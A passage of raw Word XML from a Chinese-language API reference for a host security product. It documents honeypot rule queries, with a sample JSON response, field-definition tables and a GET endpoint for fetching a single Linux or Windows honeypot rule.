      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "未分组主机（Linux）",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了mysql或者DNSmasq",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "hostname",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "verifyStatus": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "ports": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "port": 80,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "status": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "port": 8000,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "status": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "port": 8080,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "status": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538DEE75"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452"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="3451"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4B2B015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701D340" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C12026F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09F44168" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A7DE79A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4CF3A778" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BDE82BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3249EE8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5950FD39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="130F4C6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1AD8189A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A6C9770" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72FA6C4A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C195377" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42A3A404" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="30F628D4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F349C0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50533281" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22C556E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07A3C62C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2D4E33E9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E89123F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B8DF4CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FF4FDF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64BFCDFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6EC45BCB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C2A32AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69E73086" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="653D736C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0181E1E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6334682E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E0264C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CE0BFD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="152C9910" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AF8BB40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="405DB358" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C8D9622" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EC58600" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AB253FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="364CEE46" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06A13C42" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65B60E7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14568AE2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="571ABFCA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="383C915C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="621382CB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72916E8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="504A97AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58A97EEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7976EA9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7AF72BE4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="218D8608" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D5BA40B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FB10A3E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55E2DAF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2005CBB2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="775BB4D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1434EB2E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D2F062C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="200CA43F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>规则状态，0:规则启用 1:规则禁用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="19515CF7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19643818" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>verifyStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34C8AEAF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11E251BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32664AD3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>同步状态，0:规则同步中 1:同步完毕</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="60F6C36F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6168412D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77994631" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E26C6C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40A3A4D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>规则端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75B46D89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="788"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="5403"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="06206A5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5DB1669" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60F77483" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="103DB28A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29F70FA8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4CCE72D2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="249D2C75" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CBF4099" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="101DFAFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6932615F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4686FC08" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2717BF0D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55092A9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BB4C185" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4070E827" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口状态，含义如下：-1:同步行中 1:同步成功 0:同步失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="437F8CE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="174" w:name="查询单条规则-2"/>
      <w:bookmarkEnd w:id="173"/>
      <w:r>
        <w:t>查询单条规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4D7D7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux/Windows网络蜜罐单条规则的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD4231E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2753EF4C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/detect/honeypot/{linux,win}/rule/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0FEF54"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630"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="854"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="6AEA1ED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05D569D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
